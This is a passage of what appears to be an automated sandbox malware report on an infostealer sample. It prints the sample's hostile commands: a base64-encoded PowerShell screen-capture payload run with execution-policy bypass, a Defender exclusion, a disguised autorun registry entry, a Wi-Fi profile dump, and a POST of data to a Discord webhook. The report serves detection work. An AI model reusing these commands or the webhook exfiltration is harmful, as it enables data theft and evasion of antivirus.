AHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\TMPN.exe, ProcessId: 2244, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6320, TargetFilename: C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\TMPN.exe", ParentImage: C:\Users\user\Desktop\TMPN.exe, ParentProcessId: 2244, ParentProcessName: TMPN.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe, ProcessId: 5480, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Users\user\Desktop\TMPN.exe", ParentImage: C:\Users\user\Desktop\TMPN.exe, ParentProcessId: 2244, ParentProcessName: TMPN.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 5924, ProcessName: netsh.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	Virustotal: Detection: 70%			Perma Link

Multi AV Scanner detection for submitted file

Source: TMPN.exe	ReversingLabs: Detection: 68%
Source: TMPN.exe	Virustotal: Detection: 70%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TMPN.exe

Joe Sandbox ML: detected

Source: TMPN.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: :C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.pdb source: powershell.exe, 00000010.00000002.2281611258.00000214665AF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.pdb source: powershell.exe, 00000010.00000002.2372692651.000002147D03C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.pdbhP source: powershell.exe, 00000010.00000002.2281611258.00000214665AF000.00000004.00000800.00020000.00000000.sdmp

Networking

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000010.00000002.2378348806.000002147D16D000.00000004.00000020.00020000.00000000.sdmp

String found in memory: ifdapp1xmpexifunknownsubinteropgpsapp0app13iptcirb8bimiptc8bimResInfo8bimiptcdigestthumbtEXtxmpstructxmpbagxmpseqxmpaltlogscrdescimgdescgrctlextappextcommentextcomchrominanceluminancegAMAbKGDiTXtcHRMhISTiCCPsRGBtIMEddsInfoheifPropsheifHDRANIMANMFbmppngicocurjpgtiffgifwmphotoddsadngheifwebprdfhttp://www.w3.org/1999/02/22-rdf-syntax-ns#dchttp://purl.org/dc/elements/1.1/xmphttp://ns.adobe.com/xap/1.0/xmpidqhttp://ns.adobe.com/xmp/Identifier/qual/1.0/xmpRightshttp://ns.adobe.com/xap/1.0/rights/xmpMMhttp://ns.adobe.com/xap/1.0/mm/xmpBJhttp://ns.adobe.com/xap/1.0/bj/xmpTPghttp://ns.adobe.com/xap/1.0/t/pg/pdfhttp://ns.adobe.com/pdf/1.3/photoshophttp://ns.adobe.com/photoshop/1.0/tiffhttp://ns.adobe.com/tiff/1.0/exifhttp://ns.adobe.com/exif/1.0/stDimhttp://ns.adobe.com/xap/1.0/sType/Dimensions#xapGImghttp://ns.adobe.com/xap/1.0/g/img/stEvthttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#stRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#stVerhttp://ns.adobe.com/xap/1.0/sType/Version#stJobhttp://ns.adobe.com/xap/1.0/sType/Job#auxhttp://ns.adobe.com/exif/1.0/aux/crshttp://ns.adobe.com/camera-raw-settings/1.0/xmpDMhttp://ns.adobe.com/xmp/1.0/DynamicMedia/Iptc4xmpCorehttp://iptc.org/std/Iptc4xmpCore/1.0/xmlns/MicrosoftPhotohttp://ns.microsoft.com/photo/1.0/MPhttp://ns.microsoft.com/photo/1.2/MPRIhttp://ns.microsoft.com/photo/1.2/t/RegionInfo#MPReghttp://ns.microsoft.com/photo/1.2/t/Region#rdfhttp://www.w3.org/1999/02/22-rdf-syntax-ns#dchttp://purl.org/dc/elements/1.1/xmphttp://ns.adobe.com/xap/1.0/xmpidqhttp://ns.adobe.com/xmp/Identifier/qual/1.0/xmpRightshttp://ns.adobe.com/xap/1.0/rights/xmpMMhttp://ns.adobe.com/xap/1.0/mm/xmpBJhttp://ns.adobe.com/xap/1.0/bj/xmpTPghttp://ns.adobe.com/xap/1.0/t/pg/pdfhttp://ns.adobe.com/pdf/1.3/photoshophttp://ns.adobe.com/photoshop/1.0/tiffhttp://ns.adobe.com/tiff/1.0/exifhttp://ns.adobe.com/exif/1.0/rrrstDimhttp://ns.adobe.com/xap/1.0/sType/Dimensions#xapGImghttp://ns.adobe.com/xap/1.0/g/img/stEvthttp://ns.adobe.com/xap/1.0/sType/ResourceEvent#stRefhttp://ns.adobe.com/xap/1.0/sType/ResourceRef#stVerhttp://ns.adobe.com/xap/1.0/sType/Version#stJobhttp://ns.adobe.com/xap/1.0/sType/Job#auxhttp://ns.adobe.com/exif/1.0/aux/crshttp://ns.adobe.com/camera-raw-settings/1.0/xmpDMhttp://ns.adobe.com/xmp/1.0/DynamicMedia/Iptc4xmpCorehttp://iptc.org/std/Iptc4xmpCore/1.0/xmlns/MicrosoftPhotohttp://ns.microsoft.com/photo/1.0/MPhttp://ns.microsoft.com/photo/1.2/MPRIhttp://ns.microsoft.com/photo/1.2/t/RegionInfo#MPReghttp://ns.microsoft.com/photo/1.2/t/Region#]

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.128.233 162.159.128.233

Source: Joe Sandbox View	ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: ptb.discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d HTTP/1.1Host: ptb.discord.comUser-Agent: Go-http-client/1.1Content-Length: 1238Content-Type: multipart/form-data; boundary=6fa5837df89a24915ced53a41629d349a000502395b65d6d30be104b3056Accept-Encoding: gzip

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 02:18:05 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=c0eb7746699a11ef9461de324fe0fe8a; Expires=Sun, 02-Sep-2029 02:18:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1725329886x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BiPhAM5CyqZhXR5XzQVJljf6G6oL2hyOPvhfjTVCoUNWeMArKBXrltfBrR2a6DOkmBfKfbjwQkYqPW8fGJumwRLtvPDS8kRrPrmPepNI3FiJ7dgcf6fcTJXVmAXPaYuEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=c0eb7746699a11ef9461de324fe0fe8a911be15e8723d256a05f1fbbb791e3a047210cfd12d30c668b041118e92a6b07; Expires=Sun, 02-Sep-2029 02:18:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
